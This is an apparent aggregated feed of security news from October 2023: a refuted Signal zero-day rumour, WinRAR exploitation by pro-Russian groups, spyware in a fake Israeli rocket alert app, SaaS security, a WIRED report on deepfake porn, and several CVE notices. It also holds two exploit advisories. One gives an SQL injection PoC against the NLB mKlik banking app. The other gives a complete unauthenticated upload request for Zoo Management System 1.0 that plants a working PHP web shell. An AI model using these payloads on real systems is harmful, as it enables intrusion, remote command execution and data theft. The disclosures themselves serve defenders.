By Deeba Ahmed
Zero-Day Scare: Signal Messaging App Emerges Unscathed After Thorough Probe.
This is a post from HackRead.com Read the original post: Signal Zero-Day Vulnerability Rumors Refuted by Company

On Saturday, rumours began circulating regarding a potential Signal zero-day vulnerability that could impact the security and privacy of the messaging app’s users.

****_KEY FINDINGS_****

*   **On Saturday, a rumour originated that the Signal messaging app has a zero-day vulnerability.**

*   **After extensive investigation, Signa has confirmed that it didn’t find any evidence that a zero-day exists.**

*   **Rumours originated from an unverified source, shocking everyone and making users feel wary of using the app.**

*   **Signal has reiterated its commitment to ensuring user privacy and data security in its X post.**

Zero-day vulnerabilities refer to disclosed but unpatched bugs in a system or device. These bugs are worrisome because malicious actors can exploit them before the software developers release a patch and can cause damages amounting to millions of dollars.

The popular encrypted messaging app, Signal, was recently in the news after an unverified source claimed the app contained a zero-day vulnerability. The company quickly launched an investigation and found no evidence to support this claim.

In a post on X (formerly Twitter), Signal categorically denied that a zero-day bug exists in the system while reiterating its commitment to upholding user privacy and data security. The company stated that it has a robust mechanism to detect and address potential bugs/vulnerabilities.

“PSA (public service announcement): we have seen the vague viral reports alleging a Signal 0-day vulnerability. After a responsible investigation, we have no evidence that suggests this vulnerability is real – nor has any additional info been shared via our official reporting channels,” Signal’s post read.

The company also wrote that it contacted government officials as USG was quoted as a source in the ‘copy-paste report,’ revealing that the officials denied making any such claim.

“We also checked with people across the US government, since the copy-paste report claimed USG as a source. Those we spoke to have no info suggesting this is a valid claim.”

> We also checked with people across US Government, since the copy-paste report claimed USG as a source. Those we spoke to have no info suggesting this is a valid claim.
> 
> We take reports to \[email protected\] very seriously, and invite those with real info to share it there. 2/
> 
> — Signal (@signalapp) October 16, 2023

The rumours regarding zero-day in the Signal app originated from a single, unverified source on Saturday afternoon and spread like wildfire. 

Reportedly, the bug was associated with the General Links Previews feature, leading to a complete device takeover. Allegedly, the bug could be mitigated by disabling this feature in the app.

Now that Signal has confirmed no zero-day exists in the app, users can breathe a sigh of relief and continue using this app confidently. Signal also aims to upgrade its cryptographic specifications to prevent the threat of cyberattacks facilitated by quantum computers.

Zero-day vulnerabilities still remain a cause of concern within the cybersecurity community, as many bugs are discovered every year. Google’s Project Zero reported 50 zero days in the first nine months of this year, which is much higher than zero days discovered in 2022.

****_related articles_****

1.  Signal CEO hacks Cellebrite cellphone hacking, cracking tool
2.  How to use Signal Messenger face blur tool on Android & iOS
3.  Court docs show FBI can unlock iPhones, access Signal messages
4.  Colonial Pipeline Denies Breach by RANSOMEDVC Ransomware Group
5.  Facebook blocks Signal from using ads to show Instagram data collection

Signal Zero-Day Vulnerability Rumors Refuted by Company

NLB mKlik Makedonija version 3.3.12 suffers from a remote SQL injection vulnerability.

    NLB mKlik Makedonija 3.3.12 SQL InjectionVendor: NLB Banka AD SkopjeProduct web page: https://www.nlb.mkGoogle Play: https://play.google.com/store/apps/details?id=hr.asseco.android.jimba.tutunskamk.productionAffected version: 3.3.12Summary: NLB mKlik е мобилна апликација наменета за физички лица,корисници на услугите на НЛБ Банка, која овозможува преглед наразличните продукти кои корисниците ги имаат во Банката како иизвршување на различни видови на трансакции на едноставен и предсе безбеден начин во било кој период од денот. NLB mKlik апликацијатаможе да се користи со Android верзија 5.0 или понова.Desc: The mobile application or the affected API suffers from an SQLInjection vulnerability. Input passed to the parameters that areassociated to international transfer is not properly sanitised beforebeing returned to the user or used in SQL queries. This can be exploitedto manipulate SQL queries by injecting arbitrary SQL code and disclosesensitive information.Tested on: Android 13Vulnerability discovered by Neurogenesia                            @zeroscienceAdvisory ID: ZSL-2023-5797Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5797.php23.12.2022--Incident ID: ZSL-122022-NLBTHR------------------------------DB data disclosure PoC (international transfer details/description trigger):++[select alfa1+' девизен прилив' opis from pts (nolock) where unikum =dbo.dodajnuli(:unikum ,14) and kod = 15111]-

NLB mKlik Makedonija 3.3.12 SQL Injection

Zoo Management System version 1.0 suffers from a remote shell upload vulnerability. This version originally had a shell upload vulnerability discovered by D4rkP0w4r that leveraged the upload CV flow but this particular finding leverages the save_animal flow.

# Exploit Title: Zoo Management System 1.0 - Unauthenticated RCE  
# Date: 16.10.2023  
# Exploit Author: Çağatay Ceyhan  
# Vendor Homepage: https://www.sourcecodester.com/php/15347/zoo-management-system-source-code-php-mysql-database.html#google_vignette  
# Software Link: https://www.sourcecodester.com/download-code?nid=15347&title=Zoo+Management+System+source+code+in+PHP+with+MySQL+Database  
# Version: 1.0  
# Tested on: Windows 11

## Unauthenticated users can access /zoomanagementsystem/admin/public_html/save_animal address and they can upload malicious php file instead of animal picture image without any authentication.

POST /zoomanagementsystem/admin/public_html/save_animal HTTP/1.1  
Host: localhost  
Content-Length: 6162  
Cache-Control: max-age=0  
sec-ch-ua: "Chromium";v="117", "Not;A=Brand";v="8"  
sec-ch-ua-mobile: ?0  
sec-ch-ua-platform: "Windows"  
Upgrade-Insecure-Requests: 1  
Origin: http://localhost  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary8NY8zT5dXIloiUML  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.5938.132 Safari/537.36  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: navigate  
Sec-Fetch-User: ?1  
Sec-Fetch-Dest: document  
Referer: http://localhost/zoomanagementsystem/admin/public_html/save_animal  
Accept-Encoding: gzip, deflate, br  
Accept-Language: en-US,en;q=0.9  
Connection: close

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="animal_id"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_given_name"

kdkd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_species_name"

ıdsıd  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dob"

1552-02-05  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_gender"

m  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_avg_lifespan"

3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="class_id"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="location_id"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_dietary_req"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_natural_habitat"

faad  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_pop_dist"

eterter  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_joindate"

5559-02-06  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_height"

2  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_weight"

3  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_description"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="images[]"; filename="ultra.php"  
Content-Type: application/octet-stream

<?php  
if (!empty($_POST['cmd'])) {  
    $cmd = shell_exec($_POST['cmd']);  
}  
?>  
<!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="utf-8">  
    <meta http-equiv="X-UA-Compatible" content="IE=edge">  
    <meta name="viewport" content="width=device-width, initial-scale=1">  
    <title>Web Shell</title>  
    <style>  
        * {  
            -webkit-box-sizing: border-box;  
            box-sizing: border-box;  
        }

        body {  
            font-family: sans-serif;  
            color: rgba(0, 0, 0, .75);  
        }

        main {  
            margin: auto;  
            max-width: 850px;  
        }

        pre,  
        input,  
        button {  
            padding: 10px;  
            border-radius: 5px;  
            background-color: #efefef;  
        }

        label {  
            display: block;  
        }

        input {  
            width: 100%;  
            background-color: #efefef;  
            border: 2px solid transparent;  
        }

        input:focus {  
            outline: none;  
            background: transparent;  
            border: 2px solid #e6e6e6;  
        }

        button {  
            border: none;  
            cursor: pointer;  
            margin-left: 5px;  
        }

        button:hover {  
            background-color: #e6e6e6;  
        }

        .form-group {  
            display: -webkit-box;  
            display: -ms-flexbox;  
            display: flex;  
            padding: 15px 0;  
        }  
    </style>

</head>

<body>  
    <main>  
        <h1>Web Shell</h1>  
        <h2>Execute a command</h2>

        <form method="post">  
            <label for="cmd"><strong>Command</strong></label>  
            <div class="form-group">  
                <input type="text" name="cmd" id="cmd" value="<?= htmlspecialchars($_POST['cmd'], ENT_QUOTES, 'UTF-8') ?>"  
                       onfocus="this.setSelectionRange(this.value.length, this.value.length);" autofocus required>  
                <button type="submit">Execute</button>  
            </div>  
        </form>

        <?php if ($_SERVER['REQUEST_METHOD'] === 'POST'): ?>  
            <h2>Output</h2>  
            <?php if (isset($cmd)): ?>  
                <pre><?= htmlspecialchars($cmd, ENT_QUOTES, 'UTF-8') ?></pre>  
            <?php else: ?>  
                <pre><small>No result.</small></pre>  
            <?php endif; ?>  
        <?php endif; ?>  
    </main>  
</body>  
</html>  
------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_med_record"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_transfer_reason"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_date"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_death_cause"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="an_incineration"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_gest_period"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_category"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="m_avg_body_temp"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_nest_const"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_clutch_size"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_wingspan"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="b_color_variant"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_body_temp"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_water_type"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="f_color_variant"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="rep_type"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="clutch_size"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="num_offspring"

------WebKitFormBoundary8NY8zT5dXIloiUML  
Content-Disposition: form-data; name="submit"

------WebKitFormBoundary8NY8zT5dXIloiUML--

## After the post request sent by an attacker, the malicious file can be seen under the http://localhost/zoomanagementsystem/img/animals/. the attacker can execute arbitrary command on http://localhost/zoomanagementsystem/img/animals/ultra_1697442648.php.

Zoo Management System 1.0 Shell Upload

Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems.
"The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as

Pro-Russian hacking groups have exploited a recently disclosed security vulnerability in the WinRAR archiving utility as part of a phishing campaign designed to harvest credentials from compromised systems.

"The attack involves the use of malicious archive files that exploit the recently discovered vulnerability affecting the WinRAR compression software versions prior to 6.23 and traced as CVE-2023-38831," Cluster25 said in a report published last week.

The archive contains a booby-trapped PDF file that, when clicked, causes a Windows Batch script to be executed, which launches PowerShell commands to open a reverse shell that gives the attacker remote access to the targeted host.

Also deployed is a PowerShell script that steals data, including login credentials, from the Google Chrome and Microsoft Edge browsers. The captured information is exfiltrated via a legitimate web service webhook\[.\]site.

CVE-2023-38831 refers to a high-severity flaw in WinRAR that allows attackers to execute arbitrary code upon attempting to view a benign file within a ZIP archive. Findings from Group-IB in August 2023 disclosed that the bug had been weaponized as a zero-day since April 2023 in attacks targeting traders.

The development comes as Google-owned Mandiant charted Russian nation-state actor APT29's "rapidly evolving" phishing operations targeting diplomatic entities amid an uptick in tempo and an emphasis on Ukraine in the first half of 2023.

The substantial changes in APT29's tooling and tradecraft are "likely designed to support the increased frequency and scope of operations and hinder forensic analysis," the company said, and that it has "used various infection chains simultaneously across different operations."

Some of the notable changes include the use of compromised WordPress sites to host first-stage payloads as well as additional obfuscation and anti-analysis components.

AT29, which has also been linked to cloud-focused exploitation, is one of the many activity clusters originating from Russia that have singled out Ukraine following the onset of the war early last year.

In July 2023, the Computer Emergency Response Team of Ukraine (CERT-UA) implicated Turla in attacks deploying the Capibar malware and Kazuar backdoor for espionage attacks on Ukrainian defensive assets.

"The Turla group is a persistent adversary with a long history of activities. Their origins, tactics, and targets all indicate a well-funded operation with highly skilled operatives," Trend Micro disclosed in a recent report. "Turla has continuously developed its tools and techniques over years and will likely keep on refining them."

Ukrainian cybersecurity agencies, in a report last month, also revealed that Kremlin-backed threat actors targeted domestic law enforcement entities to collect information about Ukrainian investigations into war crimes committed by Russian soldiers.

"In 2023, the most active groups were UAC-0010 (Gamaredon/FSB), UAC-0056 (GRU), UAC-0028 (APT28/GRU), UAC-0082 (Sandworm/GRU), UAC-0144 / UAC-0024 / UAC-0003 (Turla), UAC-0029 (APT29/ SVR), UAC-0109 (Zarya), UAC-0100, UAC-0106 (XakNet), \[and\] UAC-0107 (CyberArmyofRussia)," the State Service of Special Communications and Information Protection of Ukraine (SSSCIP) said.

CERT-UA recorded 27 "critical" cyber incidents in H1 of 2023, compared to 144 in the second half of 2022 and 319 in the first half of 2022. In total, destructive cyber-attacks affecting operations fell from 518 to 267.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pro-Russian Hackers Exploiting Recent WinRAR Vulnerability in New Campaign

By Waqas
If you've downloaded a rocket alert app from a third-party source, ensure it's spyware-free and delete it from your device.
This is a post from HackRead.com Read the original post: Hackers Target Israeli Rocket Alert App Users with Spyware

While the identity of the culprits behind this spyware campaign remains uncertain, their tactics closely resemble those used by pro-Palestinian hackers, such as AnonGhost.

On October 9th, 2023, **Hackread.com reported** on the infiltration by pro-Palestinian hackers associated with AnonGhost into the Red Alert app, an Israeli application designed by Kobi Snir exclusively for delivering missile and rocket alerts to the Israeli population. Seizing this opportunity, AnonGhost maliciously disseminated fabricated rocket, missile, and even nuclear bomb alerts to Israelis.

Now, Cloudflare’s Cloudforce One Threat Operations Team has uncovered a similar incident, this time targeting a different rocket alert app. The researchers identified a malicious website (redalertsme) hosting a Google Android Application (APK) impersonating the legitimate RedAlert – Rocket Alerts application originally created by Elad Nava. The motive behind this malicious website was to infect unsuspecting Israeli app users with spyware.

Rocket alert apps have gained immense popularity in Israel, providing crucial alerts to citizens about incoming air strikes, which have sadly become an all too common occurrence. The misuse of these applications, as witnessed in the recent hack, has the potential to create widespread panic and further escalate an already tense situation.

According to a **blog post** by Cloudflare, the malicious domain in question offered both iOS and Android versions of the mobile application. However, while the link for the iOS version directed users to the legitimate App Store page, the Android version was a manipulated variant.

Screenshot of the malicious website (Cloudflare)

The malicious application, while retaining elements of the original code, had been equipped with the capability to collect sensitive user data. This included access to contacts, call logs, text messages, account information, SIM card details, and a list of installed applications on the victim’s device.

To make matters worse, the malicious app operated stealthily in the background, continuously harvesting data from the compromised device. The stolen information was then sent to a remote server.

Although the data was encrypted, the use of RSA encryption with a bundled public key within the app made it theoretically possible for anyone intercepting the data packets to decrypt the information.

The website hosting the spyware-infested version of RedAlert has since been taken down. However, users who may have unwittingly installed this malicious application remain at risk. They are advised to take immediate action to cleanse their devices of the spyware.

To determine whether their devices have been compromised, users are urged to check the permissions that the app has requested. Suspicious permissions include access to call logs, contacts, phone features, and SMS capabilities. These indicators should be taken seriously to ensure the security of their devices and personal information.

While malicious **AI chatbots like WormGPT and FraudGPT** assist malicious actors in generating novel ideas with user-friendly technology, traditional cyber warfare tactics, such as hackvisits, persist. Presently, both pro-Palestinian and Israeli hackvisits **are focusing on** each other’s critical ICS products.

As hackers continuously innovate, it is crucial for users to remain vigilant and informed about safeguarding themselves from the ever-evolving landscape of cyber threats.

****_RELATED ARTICLES_****

1.  Israel’s Channel 10 TV Station Hacked by Hamas
2.  Hamas hacked the smartphones of over 100 IDF soldiers
3.  Hamas posed as women to con IDF into downloading malware
4.  Iranian Hackers Posed as Israelis in Targeted LinkedIn Phishing Attack
5.  Hamas hacked phones of IDF soldiers with seductive phones of women

Hackers Target Israeli Rocket Alert App Users with Spyware

SaaS Security’s roots are in configuration management. An astounding 35% of all security breaches begin with security settings that were misconfigured. In the past 3 years, the initial access vectors to SaaS data have widened beyond misconfiguration management. “SaaS Security on Tap” is a new video series that takes place in Eliana V's bar making sure that the only thing that leaks is beer (

SaaS Security / Cybersecurity

SaaS Security's roots are in configuration management. An astounding 35% of all security breaches begin with security settings that were misconfigured. In the past 3 years, the initial access vectors to SaaS data have widened beyond misconfiguration management. "**SaaS Security on Tap**" is a new video series that takes place in Eliana V's bar making sure that the only thing that leaks is beer (maximum), and not SaaS data. This series takes a look at the key concepts within SaaS security and educates organizations on what new threat vectors need to be addressed.

****The Annual SaaS Security Survey Report: 2024 Plans and Priorities****

With the increase in SaaS application use, it's no surprise that incidents are up. The SaaS Security on Tap series covers this year's SaaS Security report which found that 55% of organizations have experienced a SaaS security incident within the last two years, including data leaks, data breaches, ransomware attacks, and malicious applications.

The report was not all doom and gloom. As Eliana V points out, companies are recognizing that manual audits and CASB deployments are only _partial_ solutions at best. A surprising 80% of companies are either using or planning on using a SaaS Security Posture Management (SSPM) tool, like Adaptive Shield, for automated configuration and SaaS security monitoring by September 2024. That should take SaaS applications to a far more secure place than they are today.

****Identity and Access Governance – Getting into the Who in SaaS Security****

SaaS Security on Tap reveals that as more organizations adopt SSPM, they are enhancing their visibility into SaaS app users. SaaS experts have come to recognize the critical nature of identity and access governance in securing SaaS apps. While much of SaaS security falls under the control of app owners, responsibility for identity and access governance falls squarely within the responsibility of the security and central IT team. They manage the company's Identity Provider (IdP) and need visibility to see which users are accessing applications, the level of access they have, and the type of users they are.

Identity security is all about ensuring that identity and access tools and policies are in place. Security teams need a high degree of visibility to know which users, including external users, have access to each application and to what extent. To fully quantify the risk emanating from users, they also need visibility into the devices used to access those applications and the ability to monitor high-privilege users.

****Uncovering the Risks & Realities of Third-Party Connected Apps****

Third-party application integrations, also known as SaaS-to-SaaS access, have also developed into a serious attack vector. These applications, which are integrated through OAuth protocols with the click of a button, improve workflows and help businesses get more out of their applications. While many of these SaaS-to-SaaS applications are harmless, they pose a significant risk. 3rd-party apps often ask for intrusive permission scopes, like Eliana V quips in the On Tap video (below), "some scopes ask for your firstborn child."

Users are granting permissions that allow read/write access, the ability to send email as a user, and most concerning, the ability to delete entire folders and drives of data. Eliana V points out that researchers found organizations with 10,000 SaaS users averaged over 6,700 applications connected to their Google Workspace, of which 89% requested medium- or high-risk permission scopes.

****A Few Words About SaaS Security On Tap****

SaaS Security on Tap provides a fast-paced, entertaining look at the challenges and solutions organizations face as they try to secure their data in SaaS apps.

Hosted by Eliana V from the SaaS Security On Tap bar, the series gets inside the issues facing security teams and their application-owner partners. Take misconfiguration management. Using entertaining analogies and powerful examples, Eliana V demonstrates the dangers of misconfigurations and the ease with which organizations err with their settings.

Check out the trailer…and like and subscribe if you want more.

**_Don't miss an episode of_** **_Saas Security On Tap_****_, the entertaining new video series that gets to the heart of SaaS security._**

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

The Fast Evolution of SaaS Security from 2020 to 2024 (Told Through Video)

Cross-Site Request Forgery (CSRF) vulnerability in Pixelative, Mohsin Rafique AMP WP – Google AMP For WordPress plugin <= 1.5.15 versions.

**Solution**

 No fix

No patched version is available.

qilin\_99 discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress AMP WP Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

CVE-2023-45831: WordPress AMP WP – Google AMP For WordPress plugin <= 1.5.15 - Cross Site Request Forgery (CSRF) vulnerability - Patchstack

New research shows the number of deepfake videos is skyrocketing—and the world's biggest search engines are funneling clicks to dozens of sites dedicated to the nonconsensual fakes.

Google’s and Microsoft’s search engines have a problem with deepfake porn videos. Since deepfakes emerged half a decade ago, the technology has consistently been used to abuse and harass women—using machine learning to morph someone’s head into pornography without their permission. Now the number of nonconsensual deepfake porn videos is growing at an exponential rate, fueled by the advancement of AI technologies and an expanding deepfake ecosystem.

A new analysis of nonconsensual deepfake porn videos, conducted by an independent researcher and shared with WIRED, shows how pervasive the videos have become. At least 244,625 videos have been uploaded to the top 35 websites set up either exclusively or partially to host deepfake porn videos in the past seven years, according to the researcher, who requested anonymity to avoid being targeted online.

Over the first nine months of this year, 113,000 videos were uploaded to the websites—a 54 percent increase on the 73,000 videos uploaded in all of 2022. By the end of this year, the analysis forecasts, more videos will have been produced in 2023 than the total number of every other year combined.

These startling figures are just a snapshot of how colossal the issues with nonconsensual deepfakes has become—the full scale of the problem is much larger and encompasses other types of manipulated imagery. A whole industry of deepfake abuse, which predominantly targets women and is produced without people’s consent or knowledge, has emerged in recent years. Face-swapping apps that work on still images and apps where clothes can be “stripped off a person” in a photo with just a few clicks are also highly prominent. There are likely millions of images being created with these apps.

“This is something that targets everyday people, everyday high school students, everyday adults—it's become a daily occurrence,” says Sophie Maddocks, who conducts research on digital rights and cyber-sexual violence at the University of Pennsylvania. “It would make a lot of difference if we were able to make these technologies harder to access. It shouldn't take two seconds to potentially incite a sex crime.”

The new research highlights 35 different websites, which exist to exclusively host deepfake pornography videos or incorporate the videos alongside other adult material. (It does not encompass videos posted on social media, those shared privately, or manipulated photos.) WIRED is not naming or directly linking to the websites, so as not to further increase their visibility. The researcher scraped the websites to analyze the number and duration of deepfake videos, and they looked at how people find the websites using the analytics service SimilarWeb.

Many of the websites make it clear they host or spread deepfake porn videos—often featuring the word _deepfakes_ or derivatives of it in their name. The top two websites contain 44,000 videos each, while five others host more than 10,000 deepfake videos. Most of them have several thousand videos, while some only list a few hundred. Some videos the researcher analyzed have been watched millions of times.

The research also identified an additional 300 general pornography websites that incorporate nonconsensual deepfake pornography in some way. The researcher says “leak” websites and websites that exist to repost people’s social media pictures are also incorporating deepfake images. One website dealing in photographs claims it has “undressed” people in 350,000 photos.

Measuring the full scale of deepfake videos and images online is incredibly difficult. Tracking where the content is shared on social media is challenging, while abusive content is also shared in private messaging groups or closed channels, often by people known to the victims. In September, more than 20 girls aged 11 to 17 came forward in the Spanish town of Almendralejo after AI tools were used to generate naked photos of them without their knowledge.

“There has been significant growth in the availability of AI tools for creating deepfake nonconsensual pornographic imagery, and an increase in demand for this type of content on pornography platforms and illicit online networks,” says Asher Flynn, an associate professor at Monash University, Australia, who focuses on AI and technology-facilitated abuse. This is only likely to increase with new generative AI tools.

The gateway to many of the websites and tools to create deepfake videos or images is through search. Millions of people are directed to the websites analyzed by the researcher, with 50 to 80 percent of people finding their way to the websites via search. Finding deepfake videos through search is trivial and does not require a person to have any special knowledge about what to search for.

The issue is global. Using a VPN, the researcher tested Google searches in Canada, Germany, Japan, the US, Brazil, South Africa, and Australia. In all the tests, deepfake websites were prominently displayed in search results. Celebrities, streamers, and content creators are often targeted in the videos. Maddocks says the spread of deepfakes has become “endemic” and is what many researchers first feared when the first deepfake videos rose to prominence in December 2017.

Since the tools needed to create deepfake videos emerged, they’ve become easier to use, and the quality of the videos being produced has improved. The wave of image-generation tools also offers the potential for higher-quality abusive images and, eventually, video to be created. And five years after the first deepfakes started to appear, the first laws are just emerging that criminalize the sharing of faked images.

The proliferation of these deepfake apps combined with a greater reliance on digital communications in the Covid-19 era and a "failure of laws and policies to keep pace" has created a “perfect storm,” Flynn says.

Experts say that alongside new laws, better education about the technologies is needed, as well as measures to stop the spread of tools created to cause harm. This includes action by firms that host the websites and also search engines, including Google and Microsoft’s Bing. Currently, Digital Millennium Copyright Act (DMCA) complaints are the primary legal mechanism that women have to get videos removed from websites.

Henry Ajder, a deepfake and generative AI expert who has monitored the spread of the technologies, says adding more “friction” to the process of people finding deepfake porn videos, apps to change people’s faces, and tools that specifically allow the creation of nonconsensual images can reduce the spread. “It's about trying to make it as hard as possible for someone to find,” he says. This could be search engines down-ranking results for harmful websites or internet service providers blocking sites, he says. “It's hard to feel really optimistic, given the volume and scale of these operations, and the need for platforms—which historically have not taken these issues seriously—to suddenly do so,” Ajder says.

“Like any search engine, Google indexes content that exists on the web, but we actively design our ranking systems to avoid shocking people with unexpected harmful or explicit content they don't want to see,” says Google spokesperson Ned Adriance, pointing to its page on when it removes search results. Google’s support pages say it is possible for people to request that “involuntary fake pornography” be removed. Its removal form requires people to manually submit URLs and the search terms that were used to find the content. “As this space evolves, we're actively working to add more safeguards to help protect people, based on systems we've built for other types of nonconsensual explicit imagery,” Adriance says.

Courtney Gregoire, chief digital safety officer at Microsoft, says it does not allow deepfakes, and they can be reported through its web forms. “The distribution of nonconsensual intimate imagery (NCII) is a gross violation of personal privacy and dignity with devastating effects for victims,” Gregoire says. “Microsoft prohibits NCII on our platforms and services, including the soliciting of NCII or advocating for the production or redistribution of intimate imagery without a victim’s consent.”

While the number of videos and pictures continues to skyrocket, the impact on victims can be long-lasting. “Gender-based online harassment is having an enormous chilling effect on free speech for women,” Maddocks says. As reported by WIRED, female Twitch streamers targeted by deepfakes have detailed feeling violated, being exposed to more harassment, and losing time, and some said the nonconsensual content found its way to family members.

Flynn, the Monash University professor, says her research has found “high rates” of mental health concerns—such as anxiety, depression, self-injury, and suicide—as a result of digital abuse. “The potential impacts on a person’s mental and physical health, as well as impacts on their employment, family, and social lives can be immense,” Flynn says, “regardless of whether the image is deepfaked or ‘real.’”

Deepfake Porn Is Out of Control

Grafana is an open-source platform for monitoring and observability.

The Google Sheets data source plugin for Grafana, versions 0.9.0 to 1.2.2 are vulnerable to an information disclosure vulnerability.

The plugin did not properly sanitize error messages, making it potentially expose the Google Sheet API-key that is configured for the data source.

This vulnerability was fixed in version 1.2.2.



CVE-2023-4457

Cross-Site Request Forgery (CSRF) vulnerability in Matt McKenny Stout Google Calendar plugin <= 1.2.3 versions.

**Solution**

 No fix

No patched version is available.

Found this useful? Thank Mika for reporting this vulnerability. Buy a coffee ☕

Mika discovered and reported this Cross Site Request Forgery (CSRF) vulnerability in WordPress Stout Google Calendar Plugin. This could allow a malicious actor to force higher privileged users to execute unwanted actions under their current authentication. This vulnerability has not been known to be fixed yet.

**No other known vulnerabilities for this plugin**Report

**WordPress plugin developer?**

Start a free security program for your WordPress plugins or request an audit.

Apply for MVDP

**Security researcher?**

Report to Patchstack Alliance bounty platform and earn monthly cash prizes.

Learn more

Tag

#google